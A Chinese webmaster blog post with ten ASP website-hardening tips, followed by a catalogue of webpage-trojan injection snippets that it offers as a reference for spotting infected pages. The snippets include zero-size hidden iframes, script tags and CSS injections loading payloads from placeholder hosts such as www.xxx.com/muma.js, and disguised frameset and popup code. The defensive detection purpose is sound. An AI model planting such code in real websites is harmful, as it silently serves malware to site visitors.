如何有效的保证网站安全及查找网页挂马

  网站运行稳定,是各位站长最想看到的,一分耕耘一分收获维护网站安全得用心得细心,那么如何保证网站安全,如果出现被挂马如何辨别,众生网络 在此分享下几个方法,不管你懂不懂程序都能做到!

  1、建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。

  2、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。

  这其中包括各种新闻发布、商城及论坛程序,只要可以上传文件的asp都要进行身份认证!

  3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。

  4、到正规网站下载asp程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。

  5、要尽量保持程序是最新版本。

  6、不要在网页上加注后台管理程序登陆页面的链接。

  7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。

  8、要时常备份数据库等重要文件。

  9、日常要多维护,并注意空间中是否有来历不明的asp文件。记住:一分汗水,换一分安全!

  10、一旦发现被入侵,除非自己能识别出所有木马文件,否则要删除所有文件。

  重新上传文件前,所有asp程序用户名和密码都要重置,并要重新修改程序数据库名称和存放路径以及后台管理程序的路径。

  做好以上防范措施,您的网站只能说是相对安全了,决不能因此疏忽大意,因为入侵与反入侵是一场永恒的战争

  E.挂马代码大全

  ps:检查文件是否被挂马的时候可以参考下!

  一:框架挂马

  <iframe src=地址 width=0 height=0></iframe>

  二:js文件挂马

  首先将以下代码

  document.write(“<iframe width=’0′ height=’0′ src=’地址’></iframe>”);

  保存为xxx.js,

  则JS挂马代码为

  <script language=javascript src=xxx.js></script>

  三:js变形加密

  <script language=”Jscript.Encode” src=http://www.xxx.com/muma.txt></script>

  muma.txt可改成任意后缀

  四:body挂马

  <body ></body>

  五:隐蔽挂马

  top.document.body.innerHTML = top.document.body.innerHTML + ‘rn<iframe src=”http://www.xxx.com/muma.htm/”></iframe>’;

  六:css中挂马

  body {

  background-image: url(‘javascript:document.write(“<script src=http://www.XXX.net/muma.js></script>”)’)}

  七:JAJA挂马

  <script language=javascript>

  window.open (“地址”,”",”toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1″);

  </script>

  八:图片伪装

  <html>

  <iframe src=”网马地址” height=0 width=0></iframe>

  <img src=”图片地址”></center>

  </html>

  九:伪装调用:

  <frameset rows=”444,0″ cols=”*”>

  < frame src=”打开网页” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″>

  <frame src=”网马地址” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″>

  </frameset>

  十:高级欺骗

  <a href=”http://www.*****.com(迷惑连接地址,显示这个地址指向木马地址)” > 页面要显示的内容 </a>

  < script Language=”Javascript”>

  function www_163_com ()

  {

  var url=”网马地址”;

  open(url,”NewWindow”,”toolbar=no,location=no,directories=no,

  status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10″);

  }

  </script>

 

上一篇:安卓防火墙 PS DroidWall

下一篇:IPC$空连接主机步骤与简单入侵示例